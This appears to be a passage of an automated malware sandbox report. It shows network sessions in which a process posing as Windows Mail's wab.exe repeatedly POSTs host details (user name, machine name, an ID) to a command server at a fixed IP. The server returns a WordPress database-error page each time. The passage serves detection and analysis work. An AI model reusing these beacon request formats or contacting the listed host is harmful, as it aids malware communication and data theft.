                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:05.395247936 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:05.395266056 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.54977724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:05.710998058 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:05.873667002 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:06.684940100 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:05 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:06.684983969 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:06.684995890 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.54977824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:06.993243933 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:07.155816078 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:07.945854902 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:07 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:07.945898056 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:07.945934057 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.54977924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:08.287617922 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:08.450423956 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:09.262887955 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:08 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:09.262954950 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:09.262989998 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              60192.168.2.54978024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:11.036801100 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:11.199219942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:11.996228933 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:11 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
